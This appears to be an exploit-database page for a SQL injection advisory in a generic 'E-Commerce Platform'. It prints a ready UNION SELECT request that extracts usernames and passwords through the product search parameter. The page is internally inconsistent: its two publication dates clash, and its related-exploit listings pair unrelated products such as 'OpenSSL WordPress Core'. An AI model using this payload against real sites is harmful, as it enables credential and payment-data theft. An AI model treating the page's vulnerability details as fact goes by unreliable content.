High Severity CVE-2024-5678
Published: Feb 2, 2024

SQL Injection in E-Commerce Platform

Sqli
Type
8.5
CVSS Score
286
Views
admin
Author

Description

SQL injection vulnerability in the product search functionality allows attackers to extract sensitive database information including user credentials and payment data.

Affected Systems

E-Commerce Platform v3.0-3.2

Proof of Concept

Security Warning

This code is provided for educational and research purposes only. Do not use against systems you do not own or have explicit permission to test.

Exploit Code 
GET /search?q=test' UNION SELECT username,password FROM users--

References

Timeline

Discovered: Jan 28, 2024
Published: Feb 1, 2024
Community Rating
8

Login to rate this exploit

Quick Actions
Related Exploits
Critical Adobe Photoshop - Sqli...
High [local] Microsoft Windows Server 2016 - Win32k Elevation of ...
High OpenSSL WordPress Core - Privilege Escalation...